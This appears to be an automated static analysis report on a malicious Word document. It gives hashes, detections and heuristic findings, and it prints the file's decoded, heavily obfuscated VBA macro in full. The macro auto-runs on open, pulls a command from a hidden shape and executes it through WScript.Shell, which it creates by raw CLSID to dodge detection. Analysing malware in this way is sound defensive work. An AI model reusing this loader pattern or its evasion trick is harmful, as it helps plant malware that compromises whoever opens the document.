Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4c2772556323bbc7…

MALICIOUS

Office (OLE)

92.6 KB Created: 2018-11-27 06:47:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 2dbfff3b82120f21d6a0ade8967d8b71 SHA-1: f047be65d4455eae5b363fc4918ddbfd88cd6c59 SHA-256: 4c2772556323bbc74f23e33cc96425606b6baf7bb316bec336a80b6465ec10b6
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros that leverage the `WScript.Shell` COM object to execute a command-line payload. This payload is heavily obfuscated but appears to be designed to download and save a second-stage executable, likely from one of the embedded URLs, and then execute it. The use of `cmd.exe` with execution flags and the `GetObject` call are strong indicators of malicious intent.

Heuristics 9

  • ClamAV: Doc.Malware.Powload-6794695-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    End Select
    Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    End Select
    Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12509 bytes
SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
 For Each tCRmww In cjOZubIUH
         kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
      Next
      Select Case nIlSZJi
         Case 313746974
            AIanbwB = Cos(85802899)
            rWDfl = 31330792
         Case 195015284
            UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
            ijYUNNGf = Hex(IXhoXpZ)
End Select
   On Error Resume Next
 For Each zbWzcRhHC In VQIIhBfbO
         bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
      Next
      Select Case OspTTbaF
         Case 209804501
            qJNPmd = Cos(218375070)
            MhGtz = 145696194
         Case 46301993
            lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
            oVVHif = Hex(tTMGpdc)
End Select
   On Error Resume Next
 For Each NZVHrkKL In TjuLhH
         lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
      Next
      Select Case iSwlj
         Case 174291133
            jATQV = Cos(32184809)
            TMzjzzbw = 155141669
         Case 162786170
            aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
            UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
   On Error Resume Next
 For Each MDRDNark In uAGiriYA
         mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
      Next
      Select Case BWijmJ
         Case 201942448
            kEhHvqj = Cos(194704665)
            PPiLNTFA = 19093991
         Case 182887480
            ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
            sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
   On Error Resume Next
 For Each KlzYSHp In QhKMTjcLF
         voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
      Next
      Select Case BKBPRQ
         Case 103785002
            QdjHlcL = Cos(92786179)
            TwBwjwZk = 269902525
         Case 338384224
            SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
            WLRRR = Hex(bicQSC)
End Select
   On Error Resume Next
 For Each ftkth In HASoPDlQp
         SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
      Next
      Select Case DHMAZt
         Case 251970365
            PnVZjEf = Cos(257714439)
            ONGCJuS = 200111815
         Case 277042021
            lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
            ZswItNu = Hex(jzAbajD)
End Select
   On Error Resume Next
 For Each ApwVn In CMELjroC
         GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
      Next
      Select Case PrOHz
         Case 13310610
            rdiXFJum = Cos(250255883)
            TAjNhtPI = 264091739
         Case 148511364
            bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
            NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
   On Error Resume Next
 For Each kPvffaG In iXnFZ
         TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
      Next
      Select Case hXPHmUX
         Case 152511519
            RdPUHS = Cos(18580377)
            BCwGpd = 124286432
         Case 100634376
            FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
            iFkQCvIsY = Hex(twrMPbiAD)
End Select
   On Error Resume Next
 For Each CqlvcV In DXlrz
         hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
      Next
      Select Case MoqXm
         Case 162925158
            GwSmbB = Cos(202943925)
            wjcqBsqju = 103417532
         Case 80444247
            qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
            FhizfRLVF = Hex(HaEYFnujF)
End Select
   On Error Resume Next
 For Each MZzwQnqo In QDooRffIS
         azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
      Next
      Select Case CVlvkMfqE
         Case 212535782
            HXPOabrhb = Cos(12874634)
            BBdowS = 244782857
         Case 204857202
            OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
            wBmwnTk = Hex(vONEZJ)
End Select
   On Error Resume Next
 For Each FjGpuG In dhSwCGjpz
         DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
      Next
      Select Case QVKpwa
         Case 160069389
            onGzWzoQH = Cos(230948378)
            FMASYUnv = 296698585
         Case 328270162
            unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
            qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
   On Error Resume Next
 For Each vHRwKItYm In XkmmqNuC
         qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
      Next
      Select Case JBSkZwzs
         Case 167638167
            ilTMqjGz = Cos(168295996)
            taLsMZ = 21015202
         Case 188878421
            NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
            KfaHRpiqa = Hex(AuWjLDM)
End Select
   On Error Resume Next
 For Each jjcwwAsO In YmJLIVNPb
         wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
      Next
      Select Case VPHjqF
         Case 267809812
            vjzbSFivP = Cos(328242907)
            PQXjwWri = 209152702
         Case 147033808
            MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
            JtRwwiLK = Hex(WITuTkUIH)
End Select
   On Error Resume Next
 For Each OfzHou In JwEUAOZXi
         biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
      Next
      Select Case GWbJAth
         Case 16663999
            sESmdSG = Cos(127611853)
            fVNGjk = 156406794
         Case 259854236
            oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
            sZACT = Hex(XLAqqlM)
End Select
   On Error Resume Next
 For Each sBdkdLfBZ In ihuEXJu
         jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
      Next
      Select Case DZNREVsPd
         Case 40155471
            dHmRE = Cos(154286559)
            UPiVRp = 55739726
         Case 13121030
            TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
            iszAzuiOH = Hex(IXJCUZzw)
End Select
   On Error Resume Next
 For Each QAbrKN In THbVkjE
         TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
      Next
      Select Case rkzSoDw
         Case 12798221
            hbiIw = Cos(30508862)
            fHWzfCzpu = 95623090
         Case 331322088
            sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
            KDzokH = Hex(ZFTJipH)
End Select
   On Error Resume Next
 For Each jomNUGAW In JjwrZ
         BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
      Next
      Select Case VjAAp
         Case 325411059
            bSBjH = Cos(64390780)
            VFzcC = 179905002
         Case 260675052
            ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
            RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
   On Error Resume Next
 For Each mDSRNbQ In pwLzCLj
         NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
      Next
      Select Case fDjEF
         Case 197606317
            WNUhO = Cos(67366311)
            TOVjw = 241016264
         Case 89213563
            OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
            SdiOQX = Hex(AWHwvpJ)
End Select
   On Error Resume Next
 For Each iZdpF In Uawli
         nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
      Next
      Select Case TrJUFMYZ
         Case 260899405
            XWfHA = Cos(102563597)
            EQOoddPQ = 208631984
         Case 277927964
            KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
            SYBqNt = Hex(ZWjOl)
End Select
   On Error Resume Next
 For Each jjdGlzvfL In KGKYkfCH
         MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
      Next
      Select Case kJKttiVt
         Case 246511817
            kunOQfFPB = Cos(266420009)
            zbQhNVbd = 259275296
         Case 317289365
            hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
            cjJfCmh = Hex(LjJuPwziN)
End Select
   On Error Resume Next
 For Each qTjqwf In EhdAwE
         KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
      Next
      Select Case ipvnvjB
         Case 252434425
            AGamQf = Cos(192246898)
            LtsHtVj = 100545256
         Case 270212401
            XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
            ZdiJNkUOY = Hex(wiHSK)
End Select
   On Error Resume Next
 For Each QNDAKCqz In BamncLM
         YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
      Next
      Select Case oEhGu
         Case 82416589
            OcNULkIW = Cos(122456823)
            aQYVcWBif = 69462747
         Case 277720160
            ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
            uzKkLi = Hex(XOBpTDsB)
End Select
End Sub